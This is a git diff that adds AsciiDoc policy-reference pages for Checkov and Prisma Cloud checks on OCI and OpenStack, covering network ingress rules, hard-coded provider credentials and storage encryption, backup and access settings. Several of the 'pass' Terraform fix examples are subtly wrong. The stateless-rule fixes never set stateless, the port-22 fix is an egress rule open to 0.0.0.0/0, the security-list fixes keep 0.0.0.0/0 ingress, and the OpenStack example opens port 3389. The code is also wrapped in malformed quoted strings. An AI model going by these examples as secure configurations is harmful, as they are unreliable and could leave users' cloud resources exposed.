--- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-group-has-stateless-ingress-security-rules.adoc @@ -0,0 +1,32 @@ +== OCI Network Security Groups (NSG) has stateful security rules + + +=== Description + +Stateless rules for network security groups create one way traffic rather than two. +This makes it very explicit which ports are available internally and externally. +This is recommended for high volume websites. + +//// +=== Fix - Runtime + +. Go to Networking > Virtual Cloud Networks > VCN Name > Resources > Network Security Groups + +. Edit your Network Security Group + +. Under Security Rules, Rules, check "Stateless" for all rules +//// + +=== Fix - Buildtime +* *Resource:* oci_core_network_security_group_security_rule +* *Arguments:* stateless + +[source,go] +---- +resource "oci_core_network_security_group_security_rule" "pass" { +network_security_group_id = oci_core_network_security_group.test_network_security_group.id +direction = "INGRESS" +protocol = var.network_security_group_security_rule_protocol +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc new file mode 100644 index 000000000..82dc36438 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc @@ -0,0 +1,62 @@ +== OCI security groups rules allows ingress from 0.0.0.0/0 to port 22 + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1701ce20-d68f-47c1-a68e-fb42aeaecb60 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py[CKV_OCI_22] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Security groups are stateful and provide filtering of ingress/egress network traffic to OCI resources. +We recommend that security groups do not allow unrestricted ingress access to port 22. +Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "oci_core_network_security_group_security_rule" "pass" { + network_security_group_id = oci_core_network_security_group.sg.id + direction = "EGRESS" + protocol = "all" + source = "0.0.0.0/0" + + tcp_options { + destination_port_range { + max = 22 + min = 22 + } + + } +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc new file mode 100644 index 000000000..9cba8df14 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc @@ -0,0 +1,76 @@ +== OCI Security Lists with Unrestricted traffic to port 22 + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a19da9e9-3959-446b-bbc8-6980354a028f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py[CKV_OCI_19] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Security list are stateful and provide filtering of ingress/egress network traffic to OCI resources. +We recommend that security groups do not allow unrestricted ingress access to port 22. +Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "oci_core_security_list" "pass0" { + compartment_id = "var.compartment_id" + vcn_id = "oci_core_vcn.test_vcn.id" + + ingress_security_rules { + protocol = "var.security_list_ingress_security_rules_protocol" + source = "0.0.0.0/0" + + tcp_options { + max = 25 + min = 25 + source_port_range { + max = "var.security_list_ingress_security_rules_tcp_options_source_port_range_max" + min = "var.security_list_ingress_security_rules_tcp_options_source_port_range_min" + } + + } + udp_options { + max = 21 + min = 20 + source_port_range { + max = "var.security_list_ingress_security_rules_udp_options_source_port_range_max" + min = "var.security_list_ingress_security_rules_udp_options_source_port_range_min" + } + + } + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc new file mode 100644 index 000000000..f1598b2b2 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc @@ -0,0 +1,75 @@ +== OCI security list allows ingress from 0.0.0.0/0 to port 3389 + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 682880bd-f12b-4a81-90bb-b3d6d05fcd90 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py[CKV_OCI_20] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +This policy identifies Security list that allow inbound traffic on RDP port (3389) from the public internet. +As a best practice, restrict security groups to only allow permitted traffic and limit brute force attacks on your network. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "oci_core_security_list" "pass0" { + compartment_id = "var.compartment_id" + vcn_id = "oci_core_vcn.test_vcn.id" + + ingress_security_rules { + protocol = "var.security_list_ingress_security_rules_protocol" + source = "0.0.0.0/0" + + tcp_options { + max = 4000 + min = 3390 + source_port_range { + max = "var.security_list_ingress_security_rules_tcp_options_source_port_range_max" + min = "var.security_list_ingress_security_rules_tcp_options_source_port_range_min" + } + + } + udp_options { + max = 21 + min = 20 + source_port_range { + max = "var.security_list_ingress_security_rules_udp_options_source_port_range_max" + min = "var.security_list_ingress_security_rules_udp_options_source_port_range_min" + } + + } + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-vcn-has-an-inbound-security-list.adoc b/code-security/policy-reference/oci-policies/networking/ensure-vcn-has-an-inbound-security-list.adoc new file mode 100644 index 000000000..7ed60a593 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-vcn-has-an-inbound-security-list.adoc @@ -0,0 +1,80 @@ +== OCI VCN has no inbound security list + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 713fe300-01ef-4981-a3e5-32cded00372d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngress.py[CKV_OCI_16] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Virtual Cloud Networks (VCN) that lack ingress rules configured in their security lists. +It is recommended that Virtual Cloud Networks (VCN) security lists are configured with ingress rules which provide stateful and stateless firewall capability to control network access to your instances. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on Ingress rules + +. Click on Add Ingress Rules (To add ingress rules appropriately in the pop up) + +. Click on Add Ingress Rules +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_security_list +* *Arguments:* vcn_id + ingress_security_rules + + +[source,go] +---- +{ + "resource "oci_core_security_list" "pass" { + compartment_id = oci_identity_compartment.tf-compartment.id + vcn_id = oci_core_vcn.test_vcn.id + ingress_security_rules { + protocol = "all" + source="192.168.1.0/24" + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/ensure-vcn-inbound-security-lists-are-stateless.adoc b/code-security/policy-reference/oci-policies/networking/ensure-vcn-inbound-security-lists-are-stateless.adoc new file mode 100644 index 000000000..0e6d86417 --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/ensure-vcn-inbound-security-lists-are-stateless.adoc @@ -0,0 +1,82 @@ +== OCI VCN Security list has stateful security rules + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 54827b06-7c86-4886-85b6-3d984c6fddf4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py[CKV_OCI_17] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Virtual Cloud Networks (VCN) security lists that have stateful ingress rules configured in their security lists. +It is recommended that Virtual Cloud Networks (VCN) security lists are configured with stateless ingress rules to slow the impact of a denial-of-service (DoS) attack. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on Ingress rule where Stateless column is set to No + +. Click on Edit + +. Select the checkbox STATELESS + +. Click on Save Changes +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_security_list +* *Arguments:* vcn_id + ingress_security_rule + + +[source,go] +---- +{ + "resource "oci_core_security_list" "pass" { + compartment_id = oci_identity_compartment.tf-compartment.id + vcn_id = oci_core_vcn.test_vcn.id + ingress_security_rules { + protocol = "all" + source="192.168.1.0/24" + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/networking/networking.adoc b/code-security/policy-reference/oci-policies/networking/networking.adoc new file mode 100644 index 000000000..4fa64f1ab --- /dev/null +++ b/code-security/policy-reference/oci-policies/networking/networking.adoc @@ -0,0 +1,39 @@ +== Networking + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-oci-security-group-has-stateless-ingress-security-rules.adoc[OCI Network Security Groups (NSG) has stateful security rules] +| Not Supported +| + + +|xref:ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc[OCI security groups rules allows ingress from 0.0.0.0/0 to port 22] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py[CKV_OCI_22] +|LOW + + +|xref:ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc[OCI Security Lists with Unrestricted traffic to port 22] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py[CKV_OCI_19] +|LOW + + +|xref:ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc[OCI security list allows ingress from 0.0.0.0/0 to port 3389] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py[CKV_OCI_20] +|LOW + + +|xref:ensure-vcn-has-an-inbound-security-list.adoc[OCI VCN has no inbound security list] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngress.py[CKV_OCI_16] +|HIGH + + +|xref:ensure-vcn-inbound-security-lists-are-stateless.adoc[OCI VCN Security list has stateful security rules] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py[CKV_OCI_17] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/oci-policies/oci-policies.adoc b/code-security/policy-reference/oci-policies/oci-policies.adoc new file mode 100644 index 000000000..3a80d5d4e --- /dev/null +++ b/code-security/policy-reference/oci-policies/oci-policies.adoc @@ -0,0 +1,3 @@ +== OCI Policies + + diff --git a/code-security/policy-reference/oci-policies/secrets-1/bc-oci-secrets-1.adoc b/code-security/policy-reference/oci-policies/secrets-1/bc-oci-secrets-1.adoc new file mode 100644 index 000000000..9b94daf80 --- /dev/null +++ b/code-security/policy-reference/oci-policies/secrets-1/bc-oci-secrets-1.adoc @@ -0,0 +1,81 @@ +== OCI private keys are hard coded in the provider + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c2518002-c26a-4bc3-b4dd-df2675cd320b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/oci/credentials.py[CKV_OCI_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* OCI private keys are hard coded in the provider* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c2518002-c26a-4bc3-b4dd-df2675cd320b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/oci/credentials.py [CKV_OCI_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +When accessing OCI programmatically, users can use a password protected certificate. +Including that password in your files that are checked into a repository leaves you exposed to account hijacking. +We recommend using a secrets store or security tokens for secure access. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "provider "oci" { +- private_key_password = "secretPassword" +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/secrets-1/secrets-1.adoc b/code-security/policy-reference/oci-policies/secrets-1/secrets-1.adoc new file mode 100644 index 000000000..1ca0af8f2 --- /dev/null +++ b/code-security/policy-reference/oci-policies/secrets-1/secrets-1.adoc @@ -0,0 +1,14 @@ +== Secrets 1 + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-oci-secrets-1.adoc[OCI private keys are hard coded in the provider] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/provider/oci/credentials.py[CKV_OCI_1] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-block-storage-block-volume-has-backup-enabled.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-block-storage-block-volume-has-backup-enabled.adoc new file mode 100644 index 000000000..7719639f5 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-block-storage-block-volume-has-backup-enabled.adoc @@ -0,0 +1,85 @@ +== OCI Block Storage Block Volume does not have backup enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 142959c0-6cd5-4d66-8bf5-54246de46e28 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py[CKV_OCI_2] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Block Storage Volumes that are do not have backup enabled. +It is recommended to have block volume backup policies on each block volume that the block volume can be restored during data loss events. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on Edit button + +. Select the Backup Policy from the Backup Policies section as appropriate + +. Click Save Changes +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_volum +* *Arguments:* backup_policy_id + + +[source,go] +---- +{ + "resource "oci_core_volume" "pass" { + #Required + compartment_id = var.compartment_id + + #Optional + availability_domain = var.volume_availability_domain + backup_policy_id = data.oci_core_volume_backup_policies.test_volume_backup_policies.volume_backup_policies.0.id + block_volume_replicas { + #Required + availability_domain = var.volume_block_volume_replicas_availability_domain + +.... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc new file mode 100644 index 000000000..dfea7af37 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc @@ -0,0 +1,79 @@ +== OCI File Storage File Systems are not encrypted with a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cbc96be0-96a1-4586-8a3d-5dc5a8d74c22 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/FileSystemEncryption.py[CKV_OCI_15] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI File Storage File Systems that are not encrypted with a Customer Managed Key (CMK). +It is recommended that File Storage File Systems should be encrypted with a Customer Managed Key (CMK), using Customer Managed Key (CMK), provides an additional level of security on your data by allowing you to manage your own encryption key lifecycle management for the File System + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click Assign next to Encryption Key: Oracle managed key. + +. Select a Vault from the appropriate compartment + +. Select a Master Encryption Key + +. Click Assign +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_file_storage_file_system +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "oci_file_storage_file_system" "pass" { + ... + kms_key_id = oci_kms_key.test_key.id + ... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-bucket-can-emit-object-events.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-bucket-can-emit-object-events.adoc new file mode 100644 index 000000000..3bd6b2f1d --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-bucket-can-emit-object-events.adoc @@ -0,0 +1,78 @@ +== OCI Object Storage bucket does not emit object events + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 14a55666-d997-4a62-8f98-fed0efec0977 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py[CKV_OCI_7] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that are disabled with object events emission. +Monitoring and alerting on object events of bucket objects will help in identifying changes bucket objects. +It is recommended that buckets should be enabled to emit object events. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Next to Emit Object Events, click Edit. + +. In the dialog box, select EMIT OBJECT EVENTS (to enable). + +. Click Save Changes. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucket +* *Arguments:* agent_config.is_monitoring_disabled + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass" { + ... + object_events_enabled = true +... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-has-versioning-enabled.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-has-versioning-enabled.adoc new file mode 100644 index 000000000..3790e618e --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-has-versioning-enabled.adoc @@ -0,0 +1,75 @@ +== OCI Object Storage Bucket has object Versioning disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 24260955-1b50-410a-b24f-48598b5e041d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py[CKV_OCI_8] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that are not configured with a Object Versioning. +It is recommended that Object Storage buckets should be configured with Object Versioning to minimize data loss because of inadvertent deletes by an authorized user or malicious deletes. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Next to Object Versioning, click Edit. + +. In the dialog box, Clink Enable Versioing (to enable). +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucket +* *Arguments:* versioning + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass" { + ... + + versioning = "Enabled" +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc new file mode 100644 index 000000000..e7365af9f --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc @@ -0,0 +1,79 @@ +== OCI Object Storage Bucket is not encrypted with a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b28c3bfd-87bc-4a55-8b59-cd42b02028e6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py[CKV_OCI_9] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that are not encrypted with a Customer Managed Key (CMK). +It is recommended that Object Storage buckets should be encrypted with a Customer Managed Key (CMK), using Customer Managed Key (CMK), provides an additional level of security on your data by allowing you to manage your own encryption key lifecycle management for the bucket. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click Assign next to Encryption Key: Oracle managed key. + +. Select a Vault from the appropriate compartment + +. Select a Master Encryption Key + +. Click Assign +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucke +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass" { + ... + kms_key_id = var.oci_kms_key.id + ... +}", + +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-not-public.adoc b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-not-public.adoc new file mode 100644 index 000000000..9eb7b0642 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/ensure-oci-object-storage-is-not-public.adoc @@ -0,0 +1,78 @@ +== OCI Object Storage bucket is publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9270d89e-b1ef-4949-8190-449ee1c99a0d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py[CKV_OCI_10] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Object Storage buckets that are publicly accessible. +Monitoring and alerting on publicly accessible buckets will help in identifying changes to the security posture and thus reduces risk for sensitive data being leaked. +It is recommended that no bucket be publicly accessible. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click on the Edit Visibility + +. Select Visibility as Private + +. Click Save Changes +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_objectstorage_bucket +* *Arguments:* access_type + + +[source,go] +---- +{ + "resource "oci_objectstorage_bucket" "pass2" { +... + access_type = "NoPublicAccess" +... +}", + +} +---- +---- diff --git a/code-security/policy-reference/oci-policies/storage/oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/oci-policies/storage/oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc new file mode 100644 index 000000000..b195e184f --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc @@ -0,0 +1,94 @@ +== OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7ef4404e-a110-4dd5-b518-ec79fa3d5e9d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py[CKV_OCI_3] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies the OCI Block Storage Volumes that are not encrypted with a Customer Managed Key (CMK). +It is recommended that Block Storage Volumes should be encrypted with a Customer Managed Key (CMK), using Customer Managed Key (CMK), provides an additional level of security on your data by allowing you to manage your own encryption key lifecycle management for the Block Storage Volume. + +//// +=== Fix - Runtime + + +* OCI Console* + + + +. Login to the OCI Console + +. Type the resource reported in the alert into the Search box at the top of the Console. + +. Click the resource reported in the alert from the Resources submenu + +. Click Assign next to Encryption Key: Oracle managed key. + +. Select a Vault from the appropriate compartment + +. Select a Master Encryption Key + +. Click Assign +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* oci_core_volum +* *Arguments:* kms_key_id + + +[source,go] +---- +{ + "resource "oci_core_volume" "pass" { + #Required + compartment_id = var.compartment_id + availability_domain = var.volume_block_volume_replicas_availability_domain + + } + + defined_tags = { "Operations.CostCenter" = "42" } + display_name = var.volume_display_name + freeform_tags = { "Department" = "Finance" } + is_auto_tune_enabled = var.volume_is_auto_tune_enabled + kms_key_id = oci_kms_key.test_key.id + size_in_gbs = var.volume_size_in_gbs + size_in_mbs = var.volume_size_in_mbs + source_details { + #Required + id = var.volume_source_details_id + type = var.volume_source_details_type + } + +}", +} +---- + diff --git a/code-security/policy-reference/oci-policies/storage/storage.adoc b/code-security/policy-reference/oci-policies/storage/storage.adoc new file mode 100644 index 000000000..c7f905c43 --- /dev/null +++ b/code-security/policy-reference/oci-policies/storage/storage.adoc @@ -0,0 +1,44 @@ +== Storage + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-oci-block-storage-block-volume-has-backup-enabled.adoc[OCI Block Storage Block Volume does not have backup enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py[CKV_OCI_2] +|HIGH + + +|xref:ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc[OCI File Storage File Systems are not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/FileSystemEncryption.py[CKV_OCI_15] +|HIGH + + +|xref:ensure-oci-object-storage-bucket-can-emit-object-events.adoc[OCI Object Storage bucket does not emit object events] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py[CKV_OCI_7] +|HIGH + + +|xref:ensure-oci-object-storage-has-versioning-enabled.adoc[OCI Object Storage Bucket has object Versioning disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py[CKV_OCI_8] +|HIGH + + +|xref:ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc[OCI Object Storage Bucket is not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py[CKV_OCI_9] +|HIGH + + +|xref:ensure-oci-object-storage-is-not-public.adoc[OCI Object Storage bucket is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py[CKV_OCI_10] +|HIGH + + +|xref:oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc[OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py[CKV_OCI_3] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/openstack-policies/openstack-policies.adoc b/code-security/policy-reference/openstack-policies/openstack-policies.adoc new file mode 100644 index 000000000..a886439f5 --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policies.adoc @@ -0,0 +1,3 @@ +== Openstack Policies + + diff --git a/code-security/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-2.adoc b/code-security/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-2.adoc new file mode 100644 index 000000000..2e4f5ebad --- /dev/null +++ b/code-security/policy-reference/openstack-policies/openstack-policy-index/bc-openstack-networking-2.adoc @@ -0,0 +1,62 @@ +== OpenStack Security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2c994aa0-eadb-438a-ad2d-fdd74df04c9e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py[CKV_OPENSTACK_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +In OpenStack, firewall rules are used to allow or deny traffic to or from a specific network or subnet. +When you create a firewall rule, you can specify the destination IP address or range that the rule applies to. +This allows you to control which traffic is allowed or denied based on the destination IP of the traffic. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* openstack_compute_secgroup_v2 +* *Arguments:* rule.to_port + rule.from_port + + +[source,go] +---- +{ + " resource "openstack_compute_secgroup_v2" "secgroup_1" { + name = "my_secgroup" + description = "my security group" + + rule { + from_port = 3389 + to_port = 3389 + ip_protocol = "tcp" + from_group_id = "5338c192-5118-11ec-bf63-0242ac130002" + } + + }", +} +---- + diff --git 